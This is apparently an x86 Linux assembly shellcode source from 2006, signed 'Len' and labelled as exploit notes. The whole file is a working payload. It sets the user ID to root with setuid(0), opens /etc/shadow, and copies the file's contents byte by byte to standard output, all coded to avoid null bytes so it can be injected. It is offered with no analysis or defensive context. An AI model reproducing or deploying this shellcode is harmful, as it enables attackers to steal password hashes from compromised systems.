[SC] print_shadow_2.s : 2006-11-23
.globl main
main:
pushl %ebp
movl %esp, %ebp
#setuid
xorl %eax, %eax
mov $0x46, %al
xorl %ebx, %ebx
xorl %ecx, %ecx
int $0x80
jmp ONE
TWO:
#open
popl %ebx
movb $0x5, %al
movb %cl, 11(%ebx)
int $0x80
movl %eax, %ebx
loop:
#read
xorl %edx, %edx
inc %edx
movl %esp, %ecx
xorl %eax, %eax
movb $0x3, %al
int $0x80
movl %ebx, %esi
test %eax, %eax
jz done
#write
movb $0x4, %al
xorl %ebx, %ebx
movb $0x1, %bl
int $0x80
movl %esi, %ebx
jmp loop
done:
#close
movb $0x6, %al
movl %esi, %ebx
int $0x80
#exit
movb $0x1, %al
xorl %ebx, %ebx
int $0x80
ONE:
call TWO
.string "/etc/shadow"
Copyleft (C) 2007 Len. All Rights Not Reserved.
Note of Exploiting